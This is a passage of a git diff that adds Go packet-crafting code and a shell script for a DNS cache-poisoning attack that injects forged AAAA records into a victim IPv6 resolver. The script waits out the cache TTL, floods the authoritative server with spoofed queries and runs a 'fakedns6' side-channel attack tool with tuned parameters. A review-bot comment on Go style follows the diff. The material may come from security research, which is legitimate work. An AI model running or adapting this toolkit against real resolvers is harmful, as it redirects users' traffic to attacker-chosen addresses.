+ Questions: []layers.DNSQuestion{{
+ Name: []byte(name),
+ Type: layers.DNSTypeAAAA,
+ Class: layers.DNSClassIN,
+ }},
+ Authorities: nil,
+ Additionals: nil,
+ }
+
+ err := udpLayer.SetNetworkLayerForChecksum(&ipLayer)
+ if err != nil {
+ fmt.Println("udpLayer.SetNetworkLayerForChecksum @ dns.go pos 0 error", err)
+ }
+ err = Send(handle, ethernetLayer, &ipLayer, &udpLayer, &dnsLayer)
+ if err != nil {
+ fmt.Println("can not send packet @ sendDNSRequest: ", err)
+ }
+}
diff --git a/att script/4_v6_注入/code/start.sh b/att script/4_v6_注入/code/start.sh
new file mode 100644
index 0000000..03b7812
--- /dev/null
+++ b/att script/4_v6_注入/code/start.sh
@@ -0,0 +1,38 @@
+# 目前仅考虑篡改或注入AAAA记录
+# $1 for victim resolver IP, $2 想要篡改的IPv6地址结果, $3 for iface name, $4 for victim domain name, $5 for victim domain nameserver IP
+# Please run with sudo.
+
+# Verify the existing record domain, just for proof purposes.
+echo '获取原记录中:'
+dig @$1 $4 AAAA
+sleeptime=0
+sleeptime=`dig @$1 $4 AAAA | grep -o -P '[0-9]+[ \t]*IN' | head -n 1 | sed 's/IN//g'`
+
+echo "等待缓存过期,$sleeptime 秒之后开始攻击..."
+sleep $sleeptime
+
+echo "开始攻击"
+echo "攻击参数:"
+echo "目标域名权威服务地址:$5"
+echo "目标解析服务地址:$1"
+echo "目标域名:$4"
+
+# 伪造目标服务IPv6地址向权威服务器发送大量查询 [权威][目标IP][目标域名][网络接口]
+bash ./dns_query.sh $5 $1 $4 $3
+
+# 开始攻击
+# Change the argument accordingly
+echo "执行侧信道攻击脚本中"
+./fakedns6 -a=$5 -b=$1 -i=$3 -n=$4 -r=$1 -t 50000 -ad=$2 -tg 0 -s 10000 -e 65000 -j 0 -d=true
+
+
+ # Validations
+echo "攻击结束"
+dig @$1 $4 AAAA
+
+sleeptime=`dig @$1 $4 AAAA | grep -o -P '[0-9]+[ \t]*IN' | head -n 1 | sed 's/IN//g'`
+echo '如果结果未改变, 需要等待原缓存过期. 或者按 Ctrl-C取消攻击.'
+
+echo '等待两秒...'
+sleep 2
+dig @$1 $4 AAAA |
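Review bot: `Send` in this file prints the `WritePacketData` error and then returns `nil`, whereas the `Send` in `src/fakedns6/library.go` returns it; the two copies of the same function should agree, and `return handle.WritePacketData(buffer.Bytes())` would also let the existing `if err != nil` branch in `_sendDNSRequest` observe the failure instead of being unreachable. `_sendDNSRequest` uses a leading underscore, which Go naming does not use; an unexported name such as `sendDNSPacket` reads better. `GetGatewayIPv6Addr` declares an `error` result it never returns — it panics on failure — so either propagate `err` or drop the result to match what the function actually does. `GetIfaceAddr` is a verbatim copy of the one in `library.go` and does not appear to be called anywhere in this file, which makes `errors` an import carried only for dead code.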
